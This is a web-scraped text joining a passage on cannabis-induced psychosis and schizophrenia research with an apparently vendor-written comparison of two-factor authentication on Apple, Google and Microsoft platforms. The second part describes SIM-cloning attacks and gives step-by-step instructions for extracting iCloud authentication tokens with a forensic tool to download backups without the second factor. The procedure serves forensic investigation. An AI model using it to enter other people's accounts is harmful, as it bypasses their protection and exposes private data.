Despite these problems CIPD remains an important diagnostic construct that should not be ignored. CIPD allows us to conceptualize that there is a middle ground in the cannabis/psychosis association between simple intoxication and long-term psychosis. In the following section we will describe evidence linking CIPD to later schizophrenia diagnoses, thus completing a diagnostic chain from Cannabis Intoxication to CIPD to schizophrenia.
Schizophrenia is the prototypical psychotic disorder and is characterized by its chronicity and severity. Historically a schizophrenia diagnosis has required the presence of so-called first rank symptoms indicating severe psychosis [26,28]. Schizophrenia is quite common with a global prevalence of approximately 0.7% [54,55].
DSM-5 diagnostic criteria for schizophrenia are quite detailed (p. 99) so let us paraphrase here by saying schizophrenia is diagnosed when there are multiple psychotic symptoms present coupled with a decreased level of work and/or social functioning and the total duration of the disturbance is greater than 6 months.
Two or more active-phase psychotic symptoms including delusions, hallucinations, disorganized speech, grossly disorganized or catatonic behavior, and negative symptoms must be present at least a month if untreated. One of the active-phase symptoms must be either delusions, hallucinations, or disorganized speech (p.99).
The remainder of the six-month period required to make the diagnosis can include prodromal or residual/attenuated symptoms only. The DSM-5 does not make explicit reference to the historical concept of first rank symptoms however these symptoms are part of a DSM-5 Schizophrenia diagnosis in most cases given that one of delusions, hallucinations, or disorganized speech is required by the DSM-5 and delusions and hallucinations are first rank symptoms [25,27,28].
The association between cannabis and schizophrenia has been a heavily researched and debated topic in the literature and rightly so. Schizophrenia has a huge morbidity/mortality burden and if cannabis is a cause or a component cause it would be a highly modifiable risk factor for this devastating disease .
Interest in the cannabis/schizophrenia association was sparked by a study using Swedish military conscription data led by Andreassson . This data represents >97% of the age 18–20 male population of Sweden from 1969.
Data on substance use including cannabis was collected at time of conscription and schizophrenia outcomes over the next 15 years were collected and matched with the subjects’ initial reports of cannabis use.
The study documented an increased risk for schizophrenia in those who had ever used cannabis prior to their conscription and documented a dose–response relationship with respect to number of lifetime uses of cannabis and schizophrenia risk. Zammit et al conducted a 27-year follow-up of the same cohort and re-analyzed the data .
The number of subjects analyzed was 50,053. The Zammit et al. study reported an odds ratio for schizophrenia of 2.2 for ever using cannabis and an odds ratio of 6.7 for those who had used cannabis more than 50 times. The effect remained after adjusting for some potential confounders including psychiatric diagnoses at conscription, IQ score, personality variables concerned with interpersonal relationships, place of upbringing, paternal age, and cigarette smoking.
The adjusted odds ratio for ever using cannabis was 1.5 and the adjusted odds ratio for >50 cannabis uses lifetime use was 3.1. The association between cannabis use and a chronic psychotic disorder (either schizophrenia or schizophreniform disorder) in longitudinal studies has been replicated multiple times [58,59].
A 2016 meta-analysis of 10 studies (66,816 total individuals across the studies) looking at the association between degree of cannabis use and subsequent psychotic symptoms found an overall OR of 3.90 for the heavy users compared to never users .
The studies used in this meta-analysis had at least three groups of cannabis use: never; one or more intermediate levels of use; and a “heavy” level either by duration of cannabis use, frequency of cannabis use, or total number of times cannabis had been used lifetime. This meta-analysis included outcomes other than just chronic psychotic disorders but is very useful as evidence that the dose–response relationship is robust.
It has been reported in a case control study that amongst patients with psychotic disorders those who used cannabis daily, those who used higher potency cannabis, and those who started at a younger age tended to experience the onset of psychotic symptoms earlier than those psychotic disorder patients who did not use cannabis in the same high-risk ways . This can be taken as more evidence of a dose–response relationship.
There is also a well-established association between CIPD and later schizophrenia. A study using Danish registry data from 1994–2014 examined the proportion of patients given substance-induced psychotic disorder diagnoses that would go on to later be given schizophrenia or bipolar diagnoses .
These were patients that did not have schizophrenia or bipolar disorder diagnoses before the incident substance-induced psychotic episode. In this registry study it was reported that 41.2% of patients with cannabis-induced psychotic disorder eventually converted to schizophrenia. A total of 47.4% of patients with cannabis-induced psychotic disorder eventually converted to either schizophrenia or bipolar disorder.
It is intuitive that having a substance-induced psychotic episode, whatever the offending substance, could be a substantial risk factor for future psychiatric morbidity. That said, in the same Danish registry study, cannabis had the highest rate of conversion from substance-induced psychosis to schizophrenia or bipolar disorder out of all substances investigated.
Compare that 47.4% rate for cannabis to 32.3% for amphetamines, 20.2% for cocaine, 27.8% for hallucinogens, and 35.0% for mixed/other substances. Fifty percent of the cannabis-induced psychosis patients that converted to schizophrenia did so within 3.1 years of the incident psychotic episode while the remaining 50% that ended up converting to schizophrenia did so over many years.
This delayed conversion after the incident CIPD episode can be looked at as evidence for the CIPD episode being its own entity as opposed to a mis-diagnosed first episode of schizophrenia.
Other registry studies have also found persons with CIPD-consistent presentations to have a high rate of conversion to schizophrenia. A Swedish registry study for substance-induced psychosis converting to schizophrenia found cannabis to have the highest conversion rate of all substances at 18% .
A Finnish study of 18,478 inpatient case calculated that 46% of CIPD cases converted to schizophrenia and this was the highest percentage for any substance . A study using Scottish data found 21.4% of people with cannabis-induced psychotic disorder eventually converted to schizophrenia .
In that study cannabis had a lower conversion rate than cocaine and solvent-induced psychoses however the N’s for cocaine and solvent-induced disorders were very small (24 and 14 respectively compared to 276 for cannabis). In the Scottish study “multiple substance” or “other” substance-induced psychoses showed a conversion rate of 21.5%. Compared to the Danish, Swedish, and Finnish studies the Scottish data found cannabis-induced psychotic disorder conversion to schizophrenia to be more similar to the rates for other substances.
It is important to note that most of these registry studies are looking at cannabis use in relatively young people and subsequent schizophrenia or other psychotic outcomes. Age of onset of cannabis use appears to heavily influence the cannabis/schizophrenia association . One potential explanation for this is that cannabis use has stronger effects on developing brains and that is what leads to a stronger association with future psychoses.
Genetic risk is an important part of the cannabis/schizophrenia association as well. We should expect this as schizophrenia has often been estimated as having approximately 80% heritability .
A study from Gage et al used single nucleotide polymorphisms (SNPs) associated with cannabis initiation and SNPs associated with schizophrenia to calculate a small causal effect (OR = 1.04) of cannabis initiation on subsequent schizophrenia .
This study also illustrated the complex and seemingly bidirectional nature of the cannabis/schizophrenia association, calculating a stronger causal effect of schizophrenia on cannabis initiation (OR = 1.10). Another genetic study using SNPs found a similar result with OR = 1.1 for cannabis being causally implicated in schizophrenia and OR = 1.16 for the reverse .
A specific example of genetic involvement in the cannabis/schizophrenia association can be seen in the COMT gene. The COMT gene codes for the enzyme catechol-O-methyltransferase which is important in the breakdown of dopamine, particularly in the prefrontal cortex . The Val158Met SNP is a Methionine to Valine substitution that causes an alteration of enzyme activity. Val/Val homozygotes have the highest enzymatic activity, Val/Met heterozygotes have intermediate activity, and Met/Met homozygotes have the lowest activity.
This results in Val/Val homozygotes depleting dopamine the fastest and Met/Met homozygotes the slowest. Dysregulation of dopamine has long been considered a crucial part of the pathophysiology of schizophrenia and a great deal of research has been done to investigate the link between COMT polymorphisms and schizophrenia, particularly with respect to negative symptoms and cognition [69,70].
These studies have shown a variety of interesting results including some studies demonstrating significant interactions between cannabis use and COMT genotype and development of schizophrenia [17,71,72,73,74,75,76,77]. In 2005 Caspi et al reported data on 803 individuals born in Dunedin, New Zealand (known as the Dunedin cohort) .
These individuals were followed up periodically from ages 3 to 26. This study found that 13% of adolescent cannabis users with the Val/Val genotype met criteria for schizophreniform disorder at age 26 while only 1.4% of non-cannabis-using adolescents with the same Val/Val genotype met criteria for the disorder.
Schizophreniform disorder has the same DSM-5 criteria as Schizophrenia, but this diagnosis is given when the symptoms are only known to have lasted from 1–6 months. The odds ratios calculated for adolescent cannabis use and subsequent schizophreniform diagnosis for the three genotypes were 10.9 for Val/Val, 2.5 for Val/Met, and 1.1 for Met/Met. Genotype by itself without the covariant of cannabis use was not found to be significantly associated with subsequent schizophreniform diagnosis.
The impressive results from this oft-cited study demonstrate very well the concept that there appears to be an important gene–environment interaction to be considered when assessing the cannabis/schizophrenia link. However, attempts to replicate this study have been mixed with both positive and negative results [78,79,80,81,82,83,84,85].
Another example of the COMT gene’s role in the cannabis/schizophrenia association is seen in a study from Pelayo-Terán et al. published in 2009 . This study looked at 169 patients in Spain with first-episode psychosis and examined the interaction between COMT genotype and cannabis use and age of onset of psychotic symptoms and duration of untreated psychosis prior to treatment presentation.
This study found that low enzymatic activity Met/Met patients who were not cannabis users tended to have a later age of onset of psychosis and a longer period of untreated psychosis compared to Val/Val or Val/Met cannabis non-users. Longer period of untreated psychosis can be considered a proxy for more mild symptoms or primarily negative symptoms as it is expected that severe positive symptoms will be what brings patients to acute medical attention.
Based on this data the Met/Met genotype can be considered something of a protective factor against severe/early disease. The most salient finding of the study was that cannabis users with the Met/Met genotype did not have the delayed onset or longer period of untreated psychosis seen in Met/Met non-users.
This suggests that cannabis use changes the natural course of psychotic symptoms typically seen with the Met/Met genotype. This study also found that cannabis users of any COMT genotype experienced an earlier onset of symptoms compared to non-users.
In addition to discussing the cannabis/psychosis association with respect to the onset of schizophrenia we can discuss the impact of cannabis use on people who already have schizophrenia. D’Souza et al conducted a double-blind placebo-controlled study where intravenous THC was administered to Schizophrenia patients already in treatment for schizophrenia and maintained on stable antipsychotic dosages .
The study design was the same as the study on healthy subjects from the same author described above in the Cannabis Intoxication section of this review . Similar results were found in the study of healthy individuals with transient increases in positive and negative symptoms seen via PANSS (although as expected the baseline scores were higher in the schizophrenic population).
It is important to point out that these exacerbations in psychotic symptoms with cannabis administration were seen despite the schizophrenic patients being on dopamine-blocking antipsychotic drugs. A higher percentage of schizophrenia patients experienced transient symptom exacerbations compared to the study with healthy persons .
Further, schizophrenia patients with a cannabis use history compared to schizophrenic patients without a cannabis use history have been documented to have longer and more frequent psychiatric hospital stays which would seem to indicate a higher symptom burden .
King’s College London | <urn:uuid:d0c3722f-3ef6-4b83-b83e-096a1154d1d1> | CC-MAIN-2022-40 | https://debuglies.com/2020/03/21/researchers-discovered-a-single-dose-of-thc-could-induce-psychiatric-symptoms-in-people-with-no-history-of-psychosis/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00365.warc.gz | en | 0.941723 | 8,136 | 2.59375 | 3 |
In this article we’ll discuss the differences between implementations of two-factor authentication in popular mobile platforms. We’ll research how two-factor authentication is implemented in Android, iOS and Windows 10 Mobile, and discuss usability and security implications of each implementation.What Is Two-Factor Authentication?
Two-factor authentication is an additional security layer protecting access to user accounts in addition to their username and password. In two-factor authentication an extra verification step is required that is separate from the password. Ideally, two-factor authentication schemes would be based on verifying “something you have” in addition to “something you know”. In practical terms this is not always convenient for the end user, so very few straightforward implementations exist (mostly in the banking industry in Europe).
Using the extra verification step based on a piece of information that only the user knows or has access to makes it significantly harder for potential intruders to break in.
Historically, banks were the first to use two-factor authentication. A low-tech solution of pre-printed, single-use Transaction Authentication Numbers (TAN) delivered to the user’s registered home address were used on top of the login and password to authorize bank transfers. Since then the banking technology moved on, utilizing a wide range of authentication options (http://www.wikibanking.net/onlinebanking/verfahren/phototan/). For example, an authentication scheme called photoTAN makes use of complex 3D codes and interactive two-way validation. In a typical photoTAN implementation, the bank generates a unique 3D code. The code must be scanned by an authorized device such as smartphone or token which, again, had to be initialized with an interactive two-way process. The device generates a verification code that must be entered into the confirmation box.
While this authentication scheme provides exemplary security with full control over authorized devices, the authentication process is just too slow and cumbersome for an average smartphone user performing day to day activities. Other authentication schemes employ proprietary devices and chip technologies, making them even less attractive for mass use.
Developers of major mobile operating systems, Apple, Google and Microsoft, each developed their very own implementations of two-factor authentication in an attempt to balance convenience and security. The three companies arrived to very different results. So let’s have a look at what we have today for two-factor authentication on the three popular mobile platforms.
Apple has had some form of two-factor authentication since 2013. Designed to protect users’ Apple ID from being exploited in terms of direct financial loss (unauthorized purchases, password change etc.), the then-current “Two-Step Verification” scheme offered a very limited protection scope. Apple was working on a more universal solution for the upcoming version of iOS.
In August 2014, news outlets were struck with a story of 500 private pictures of various celebrities leaked via a breach of Apple’s iCloud services (https://en.wikipedia.org/wiki/ICloud_leaks_of_celebrity_photos). The photos were extracted from iCloud storage. The hackers performed targeted attack on user names, passwords and security questions using a combination of social engineering and brute-force attacks.
This was a major scandal, and Apple reacted. Ahead of iOS 9 release, Apple expanded Two-Step Verification to protect iCloud sign-ins, which included iOS backups and photos.
Apple’s First Attempt: Two-Step Verification
Two-step verification is a half-baked solution and a rushed answer to a problem long overdue. This authentication method was slapped on top of Apple’s existing mobile ecosystem and works completely on the server side. Two-step verification uses verification codes pushed to trusted devices. Since Find My Phone is used to deliver verification codes to a selected trusted device, the code would show up on the device even with its screen locked. This was but one weakness of this implementation.
Alternatively, two-step verification codes can be delivered via text messages or phone calls to a one of the registered phone numbers. Users could generate app-specific passwords from Apple ID account page https://appleid.apple.com/. Up to 25 app-specific passwords could be active at any given time.
Account recovery would be performed with a printable 14-character Recovery Key. Should the user lose their Recovery Key, they could as well lose access to their Apple account.
• Verification code pushed (via Find My Phone) to a selected trusted device
o Shows up even on locked devices!
• Text message or phone call to a registered number
• Application-specific passwords generated from Apple ID account page https://appleid.apple.com/
o Up to 25 active app-specific passwords at any given time
o Can be revoked individually
• Account recovery: 14-character printable Recovery Key
Two-step verification was never intended, and could not be, a fully featured multiple-factor authentication solution. Since support for two-factor authentication was not baked into the OS itself, it could only protect users in counted circumstances:
• Sign in to Apple ID account page
• Sign in to iCloud on a new device or at iCloud.com
• Sign in to iMessage, Game Center, or FaceTime
• Make an iTunes, iBooks, or App Store purchase from a new device
• Get Apple ID related support from Apple
Enrolling into two-step verification is possible from an Apple device or through a Web browser by signing in to My Apple ID. Users are required to enroll at least one trusted phone number, which represents yet another potential vulnerability of this scheme.
Two-Step Verification Security
How secure is Apple’s two-step verification? With no OS-level support, it can be characterized as “better than nothing”. With Find My Phone used for delivering verification codes, a hacker could easily request and receive a code on a stolen iPhone. Text and phone call delivery open yet another vector of attack, allowing intruders request a duplicate/replacement SIM card from the victim’s mobile operator using a fake power of attorney.
This last method is commonly used in Russia to target victims’ online banking apps. The banks have responded by limiting verification access to SIM card’s ICCID identifier as opposed to relying solely on the phone number. However, this is not the case with Apple, so a cloned/replacement SIM card can be successfully used to receive verification codes.
Two-step verification is still available today alongside with Apple’s second implementation called “Two-Factor Authentication” (albeit only one system can be active for a given Apple ID). As such, we’ll view it in modern rather than legacy context. In today’s day and age, Apple’s Two-Step Verification is an afterthought at best. Its limited protection scope, obvious security shortcomings and difficult recovery procedure should the user lose access to their secondary authentication factor leave much to be desired.
• Initially, 2SV did not protect iOS backups and iCloud data; protection added after Celebgate
• Also, 2SV did not prevent restoring iCloud backups onto new devices (now it does)
• Delivery via test messages of phone calls is insecure
o SMS/phone call delivery can be selected and no prompt will appear on trusted devices
• Find My Phone push is even less secure than SMS
• Verification code appears on the lock screen
o Can be accessed without entering the passcode
• Was considered the weakest implementation of all the major tech firms http://www.theregister.co.uk/2013/05/31/apple_2fa_security_weak/
Apple’s Second Attempt: Two-Factor Authentication
While two-step verification worked (and continues to work) on top of the operating system, Apple continued their work on a proper implementation. The resulting new authentication method dubbed “Two-Factor Authentication” was finally released with iOS 9.
This new authentication method is fully integrated into the mobile OS, and protects all attempts to sign in with the user’s Apple ID on a new device.
Apple’s Two-Factor Authentication, while designed to serve the same purpose, works in a distinctly different way. Interactive push notifications that must be confirmed before one can access the 6-digit verification code are now delivered by default to all trusted devices. It is no longer possible to select “text message/phone call” to quietly receive an SMS with a verification code; all trusted devices will receive a 2FA push prompt immediately upon sign-in attempt.
The following list summarizes verification code delivery options with Apple two-factor authentication:
• A notification is instantly pushed to all trusted device
o Interactive prompt
o Must unlock device to respond to prompt and access a 6-digit code
o Must enter the received 6-digit code to verify sign-in
o Each trusted device initialized with unique seed; different verification codes pushed to different devices
o Only iOS (or macOS) devices can be trusted
• 6-digit code generated from device settings (can be used offline)
o Each device uses unique seed, generated codes are different across devices (this is not a given on other platforms)
• Text message or phone call to a registered number
o An attempt to deliver push notifications to trusted devices is made beforehand
o Accessible via “Did not get a verification code?” prompt
• App-specific passwords
o Can generate and revoke app-specific passwords (e.g. veur-crlz-wksx-yege) in https://appleid.apple.com/account/manage
o Can append 6-digit authentication code to original password
Interestingly, there are two types of app-specific passwords for those apps that don’t support Two-Factor Authentication. The first type can be generated via the user’s Apple Account and looks like this: veur-crlz-wksx-yege. These passwords can only be used for limited access to certain types of information (e.g. iCloud email), and cannot be used to download iCloud backups.
The second type of app-specific passwords is more interesting. It can be produced by appending a 6-digit verification code (received or generated via the usual means), and can be used to access all types of data. For example, such passwords can be used to download iOS backups from iCloud, or to sign to Apple ID/App Store in on an iPhone running iOS 8 (which does not support Two-Factor Authentication yet).
Apple Two-Factor Authentication and Time-based One-time Password Algorithm
Starting with iOS 9, Apple added the ability to generate verification codes offline. The actual iOS device (iPhone, iPad or iPod Touch) is used as a trusted device in terms of the Time-based One-time Password Algorithm (TOTP) algorithm.
Unlike other platforms, Apple does not allow for manual initialization of trusted devices by scanning QR codes or entering a secret. Instead, each device receives a unique seed directly from Apple. This achieves two goals. First, each device receives a unique seed that can be revoked at any time without affecting other devices’ trust status (this is not the case with other platforms). Second, by making the seed inaccessible to the end user, Apple effectively keeps everything authentication-related within their closed ecosystem. Under these terms, you can only initialize an Apple device as a trusted device. You cannot have an Authenticator app on an Android smartphone or Windows 10 Mobile device.
• TOTP: offline, time-dependent code generated from the Settings of a trusted device
o Each trusted device initialized with unique seed
o Trusted devices can be individually revoked
o All devices generate different TOTP codes
In order to enable two-factor authentication, Apple requires the user to verify at least one phone number. This opens up a potential vector of attack.
• Intruder has the ability to use SMS or phone call to receive codes
• One can pull a SIM card and use in dumb phone to receive verification code
• Criminals can clone or order a new SIM card and use it to receive codes
o This is a massive problem in Russia
o Thieves use fake IDs, fake power of attorney
o Thieves gaining access to victim’s online banking
There is some improvement in this department compared to Apple’s old Two-Step Verification. When Two-Factor Authentication is active, any attempt to access the user’s Apple ID immediately pushes a 2FA prompt to all trusted devices before the intruder can request a code delivered by SMS or phone call.
Apple Two-Factor Authentication Security
This new authentication scheme is immensely better compared to the old Two-Step Verification. It’s both more secure and more convenient, allowing to generate offline authentication codes on trusted devices and prompting users on all of their devices if someone attempts to sign in to their account.
Attackers can still bypass some of these security measures. For example, if they sign in to victim’s account during the night (using a cloned/replaced SIM card, for example), the chance that the victim will be able to react to sign-in prompts is minimal.
Bypassing Two-Factor Authentication
Two-factor authentication a roadblock when investigating an Apple device. Obtaining a data backup from the user’s iCloud account is a common and relatively easy way to acquire evidence from devices that are otherwise securely protected. It might be possible to bypass two-factor authentication if one is able to extract a so-called authentication token from the suspect’s computer.
Authentication tokens are used by iCloud Control Panel that comes pre-installed on macOS computers, as well as iCloud for Windows that can be installed on Windows PCs. Authentication tokens are very similar to browser cookies. They are used to cache authentication credentials, facilitating subsequent logins without asking the user for login and password and without prompting for secondary authentication factors. Authentication tokens do not contain the user’s password, and not even a hash of the password. Instead, they are randomly generated sequences of characters that are used to identify authorized sessions.
Tip: The use of authentication tokens allows bypassing two-factor authentication even if no access to the secondary authentication factor is available.
Extracting an authentication token and re-using it on a different computer may allow to sign in to the user’s Apple ID services, which includes access to iOS backups stored in iCloud and iCloud Drive. In order to make use of authentication tokens, one must install a cloud acquisition tool such as Elcomsoft Phone Breaker.
The Forensic edition of Elcomsoft Phone Breaker comes with the ability to acquire and use authentication tokens from Windows and Mac OS X computers, hard drives or forensic disk images. Authentication tokens for all users of that computer can be extracted, including domain users (providing that their system logon passwords are known). The tools are available in both Windows and Mac versions of the tool.
Authentication tokens are obtained from the suspect’s computer on which iCloud Control Panel is installed. In order for the token to be created, the user must have been logged in to iCloud Control Panel on that PC at the time of acquisition. Authentication tokens can be extracted from live systems (a running Mac OS or Windows PC) or retrieved from users’ hard drives or forensic disk images.
iCloud Control Panel is an integral part of Mac OS systems, and installs separately on Windows PCs. Most users will stay logged in to their iCloud Control Panel for syncing contacts, passwords (iCloud Keychain), notes, photo stream and other types of data without re-typing their password. All this means that the probability of obtaining authentication tokens from PCs with iCloud Control Panel installed is high.
Extracting Authentication Tokens
To extract iCloud authentication token, launch Elcomsoft Phone Breaker (Forensic Edition) and click “Extract authentication token” on the main window.
Specify path to the token file (usually %appdata%\Apple Computer\Preferences\)
Specify path to the user’s master key, which is required to decrypt the token, then click “Extract”.
Elcomsoft Phone Breaker will extract, decrypt and display the token. You will be able to export the token into a file. You can now use this token to log into iCloud and download backup from iCloud or download files from iCloud.
If you are using a Mac OS X computer, follow the guidelines published on ElcomSoft Web site:
Up to date information on extracting authentication tokens is available at
Using Authentication Tokens to Download iCloud Backups
Downloading an iCloud backup using an authentication token works very similar to using Apple ID and password. Instead of using the Apple ID and password combination, you’ll need to supply an authentication token. Note that two-factor authentication is successfully bypassed if you use the token.
1. In the Tools menu, select the Apple tab.
2. Select Download backup from iCloud.
3. On the Download backup from iCloud page, define authentication type as Token.
4. Copy the token from the file, and paste it into the “Token” box.
5. Click Sign In to continue downloading the backup. If the token has not expired, you will be able to sign in without entering the user’s Apple ID, password, or the secondary authentication code.
Note that you need to copy the full Authentication token string from the text file you’ve extracted. On the following screen shot, the entire second line of the text file represents the authentication token:
A very common scenario for Apple users is losing their only iPhone while traveling. In such situations, a SIM card with a trusted phone number is also missing and not always easily obtainable. With Apple’s excellent backup system, recovering from such an uncomfortable situation could be as easy as visiting a nearby Apple Store for a new iPhone, entering iCloud credentials and waiting for the phone to restore from the last backup.
Two-factor authentication becomes a real roadblock. If Two-Step Verification was enabled, users were given an option to print a long Recovery Code. With this Recovery Code, they could bypass the secondary verification step. If no Recovery Code is available, there is no straightforward way to regain control over Apple ID. (Calling Apple and having a saved credit card may or may not help).
With Two-Factor Authentication, Apple introduced a formal way to reinstate account access (https://support.apple.com/en-ie/HT204921). Users are advised to go to iforgot.apple.com and follow the prompts. Apple may verify additional information such as saved credit card numbers. Even though the process is automated, recovery may take a very long time.
More information about two-step verification and two-factor authentication is available from the following sources:
• Apple two-factor authentication and the iCloud
• Apple two-factor authentication vs. two-step verification
• Security and your Apple ID
• Two-step verification for Apple ID
• Two-factor authentication for Apple ID
• Availability of two-factor authentication for Apple ID
• Switch from two-step verification to two-factor authentication
• If you can‘t sign in with two-step verification using your Apple ID
In addition, you may find the following reading both useful and interesting:
Google’s support of two-factor authentication is extensive, ranging from pre-printed backup keys to interactive, push-based notifications delivered to devices with up-to-date versions of Google Play Services via Google Cloud Messaging.
Before we start discussing Google’s two-factor authentication, let’s first look how Google protects user accounts if two-factor authentication is not enabled. If Google detects an unusual sign-in attempt (such as one originating from a new device located in a different country or continent), it may prompt the user to confirm their account. This can (or cannot) be done in various ways such as receiving a verification code to an existing backup email address that was previously configured in that account. Interestingly, even receiving and entering such a code and answering all the additional security questions Google may ask about one’s account does not actually confirm anything. Without two-factor authentication, Google may easily decline sign-in requests it deems suspicious. From first-hand experience, one is then forced to change their Google Account password. (Interestingly, Microsoft exhibits similar behavior, yet the company allows using two-factor authentication in such cases even if two-factor authentication is not enabled for that account. Weird, but that’s how it works.)
Once two-factor authentication is activated, things change. One is no longer locked out of their Google Account even when traveling, and even if attempting to log in from a new device. So let us have a look at what Google has to offer.
The Low-Tech Solution: Printable Backup Codes
Google offers the ability to generate a bunch of 10 backup codes. These are then displayed in a ready to print format (business card size), allowing users to carry this essential piece of security in their wallet.
Time-Based One-Time Passwords
The time-based one-time password algorithm is an open solution supported by pretty much the entire industry. Even Apple Two-Factor Authentication generates TOTP passwords when the user requests a verification code from device settings.
In TOTP, trusted devices are initialized with a secret. For convenience, the secret can be conveyed as a QR code. Once scanned, the QR code conveys initialization seed to the Authenticator app of the choice.
This stuff is pretty much standard. Google has its own Authenticator app available for Android and iOS, but one can use pretty much any authenticator app on any major platform. For example, Microsoft offers its own TOTP-based Authenticator app for Android, iOS and Windows 10 (both desktop and mobile). Dozens alternative apps exist.
Yes, you can use Microsoft Authenticator on Windows 10 Mobile to generate verification codes for Google Account, and vice versa: using Google Authenticator on Android successfully generates codes to Microsoft Account.
There are several essential things to know about Google’s implementation of TOTP:
– A single TOTP seed may exist at any given time, meaning that multiple authenticator apps can only be initialized with the same QR code
– Generating a new TOTP seed instantly invalidates all previously initialized authenticator apps
– There is no way to revoke trusted status from a given authenticator app without revoking all other authenticator apps initialized with that seed
Google TOTP Security
While the TOTP algorithm is an open industry standard, its implementations vary. In particular, the Android platform may introduce weaknesses allowing hackers to use vectors of attack unimaginable on other platforms.
– Seed data is not saved as part of Android 6.0 backup mechanism
– Despite that, many OEM backup tools will back up and restore Authenticator data. Such backups are often stored unprotected, allowing hackers extracting and restoring sensitive information.
o This usually within one brand (ASUS, LG etc.) or ROM (e.g. MIUI)
– If one has root access, extracting Authenticator app data is trivial
– If bootloader is unlocked and custom recovery available, a TWRP NANDroid backup can successfully save and restore 2FA data
Google App-Specific Passwords
Google supports individual app-specific passwords for apps and services that do not support two-factor authentication. These passwords are generated on request, and can be revoked individually. There is no limit to number of active app-specific passwords.
App-specific passwords offer limited access to user data. These passwords cannot be used to log in to Google Account via a Web browser, and they cannot be used for performing Google Takeout, initializing a new Android device or restoring a backup.
Verification codes can be delivered as text messages (SMS) or phone calls to a trusted phone number. This is similar to what others do, with one important exception: Google does not require verifying a phone number to activate two-factor authentication. This makes it possible for the user to configure their Google Account so that only secure authentication methods are used.
Trusted phone numbers can be added and removed at any time. Each phone number is individually revocable.
SIM-based authentication has the same issues as those we already discussed when talking about Apple’s take on two-factor authentication. The good thing is that Google does not force users to maintain a trusted phone number on their account.
Google Security Key
Google allows using FIDO Universal 2nd Factor (U2F) devices for two-factor authentication. Google Security Key is only supported on desktops and laptops (including Chromebooks) as well as select tablets with OTG functionality that can run Chrome 40 and newer. A USB port is obviously required.
Google Security Key only works in Chrome.
Last but not least, let us have a look at Google’s newest addition to the family of two-factor authentication methods, the Google Prompt.
Unlike Apple, Google does not have full control over Android, the base operating system. What Google does have, however, is full control over Google Play Services, an essential component installed on most Android smartphones and tablets sold in the Western hemisphere (Amazon being a notable exception).
Google Prompt works by pushing an interactive verification prompt through GCM (Google Cloud Messaging), which is available on Android devices as part of Google Cloud Platform and on iOS devices as part of the Google app.
Google Prompt is now the default and recommended authentication method. It’s by far the fastest and most convenient of them all. Being a simple “Yes” or “No” message delivered to a trusted device, it does not require opening an app or entering codes. If the user cannot receive the prompt, they can easily select a different authentication method (e.g. a code generated in the authenticator app or delivered in a text message).
Once again, there are no verification codes sent via this prompt. Users just confirm or deny the request. Unlike Microsoft implementation, users cannot respond to Google Prompt on locked devices. Both Android and iOS devices must be unlocked in order to confirm the request (this is not always so with Microsoft prompts).
Google Prompt was introduced in 2016, well after the release of Android 7.0 Nougat. However, Google Prompt does not depend on the version of Android. We successfully tested Google Prompt authentication on Android 5.1, 6.0.1, 7.0 and 7.1 (we don’t have devices running earlier versions of Android).
If there is one thing Google could improve is setting up trusted devices. When trying to add a bunch of Android and iOS devices as trusted devices through Google Account, we discovered that Google assumes that the user has a single Android device and (maybe) one iPhone. We were able to add other devices at a later point, but that required quite a lot of work and even triggered some sort of a warning in our Google Account with Google Prompt functionality being temporarily blocked until the next day. At the end, most but not all issues ironed out.
Users can add and remove trusted devices via Google Account Settings in a Web browser, iOS Google App or in Google Settings on Android devices.
Interestingly, when users set up new devices during initial configuration, they are prompted whether they want to make it a trusted device (Android). The same prompt is received when signing in to the Google app on iOS.
Revoking trusted status can be done either online from a different device or from the device itself (via settings or by removing the Google Account from Settings – Accounts).
Quick data sheet:
– Interactive “Yes” or “No” prompt
– Implemented via Google Cloud Messaging (GCM) on Android, Google App on iOS
– NEW: Code delivery now being tested on Android Wear
– Independent of Android or iOS version
– Requires unlocking the device to see the prompt
Google Two-Factor Authentication Conclusion
Google offers a vast number of options to set up authentication. The single least secure setting (phone-based delivery) is available but is not obligatory, allowing the user to configure 2FA in the most convenient or the most secure way, with multiple stops in between. Unlike Apple, Google allows using non-Google devices for authentication. iOS receives full support (TOTP, Google Prompt), while other platforms (BlackBerry 10, Windows Phone, Windows 10 Mobile) will work via offline, TOTP-based third-party authenticator apps.
Beginning with Windows 8.1 and Windows Phone 8.1, Microsoft started unifying its mobile and desktop operating systems. No wonder the two versions of Microsoft’s latest OS, Windows 10, share the same approach to two-factor authentication.
Microsoft employs a somewhat unique approach to two-factor authentication. Even if the user does not want to use two-factor authentication and does not set up any secondary authentication methods, in some circumstances Microsoft would still prompt to confirm account login. Just like Google, the company would verify unusual sign-in activities occurring from a new device in another country. However, it’s not just that. Microsoft would also try to verify Microsoft Account activities once the user attempts to restore a new phone (Windows Phone 8.1 or Windows 10 Mobile) from OneDrive backup. Interestingly, Microsoft would do exactly the same verification if one sets up an account on a new PC (desktop, laptop or tablet) and attempts to restore from OneDrive backup.
If no two-factor authentication is configured but the user has a trusted phone number and the device being set up is a new phone, Microsoft will attempt to send a text message to that phone. Interestingly, the SMS will be automatically processed by the setup tool; no user interaction would be required when setting up that phone.
What’s so unique about this setup is the ability for the user to configure all possible two-factor authentication methods (SMS, push, TOTP etc.) without actually ENABLING two-factor authentication. For example, one can set up offline authentication with Authenticator app (made by Google, Microsoft, or one of the many third parties) as well as prompt-based authentication with Microsoft Authenticator (available for Google, iOS and both versions of Windows 10). The second authentication factor will NOT be normally prompted. However, if Microsoft detects unusual sign-in activity, or if the user attempts performing a highly sensitive operation (restoring from a cloud backup, syncing passwords), the system will then request additional verification with any method.
If the user decides to enable the full protection provided by two-factor authentication, nothing will really change except that secondary verification will take place at every attempt to sign in to a Microsoft Account.
In a way, this all means that two-factor authentication for Microsoft Accounts is always there. Whether the user has the switch “enabled” or “disabled” only affects the scope of protection: “enabled” two-factor authentication protects all sign-in requests, while if the additional protection is “disabled” it only protects against suspicious sign-in activities and highly sensitive operations such as restoring data from a cloud backup and syncing Internet Explorer/Edge passwords with a new device.
Enrolling to two-factor authentication can only be performed online from the user’s Microsoft Account: https://account.live.com/proofs/Manage
The user does not have to have any Microsoft or Windows device in order to use two-factor authentication. It’s the same with Google, but Apple would only enable two-factor authentication if the user owns at least one iOS or macOS device. On the other hand, Apple’s two-step verification could be also enabled via the browser.
Microsoft Account: Delivery Options
Microsoft offers plenty of delivery options for secondary authentication. This includes:
• A code sent to backup email address (Microsoft or non-Microsoft email addresses supported)
